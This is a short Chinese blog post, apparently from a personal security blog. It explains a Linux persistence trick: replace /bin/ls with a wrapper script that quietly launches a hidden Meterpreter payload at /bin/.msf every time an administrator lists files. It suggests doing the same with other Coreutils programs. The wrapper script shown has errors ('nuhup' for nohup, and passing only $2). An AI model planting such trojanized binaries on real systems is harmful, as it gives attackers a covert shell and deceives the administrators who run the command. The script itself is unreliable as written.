之前想过利用nc来反弹一个sh到主机上,现在尝试一下meterpreter。
首先我们持久化的思路是管理员每次登录后一般都会运行一些常用命令,比如ls。那我们就完全可以替换掉他们的原文件,使得每次运行时既不影响结果又能获取shell。
我们把目标瞄向ls,测试系统是Ubuntu Server 18.04。直接进入/bin目录下,将ls重命名为.ls,新建一个名为ls的脚本,并输入如下内容:

1
2
3
#!/bin/sh
.ls $2
nuhup .msf > /dev/null 2>&1 &

输入后我们把生成好的meterpreter载荷保存到/bin/.msf,再赋予ls和.msf可以执行权限。这样以后每次运行ls时都会在后台隐藏运行meterpreter。
欢迎尝试其他来自Coreutils的程序。(又水了一篇博文XD。)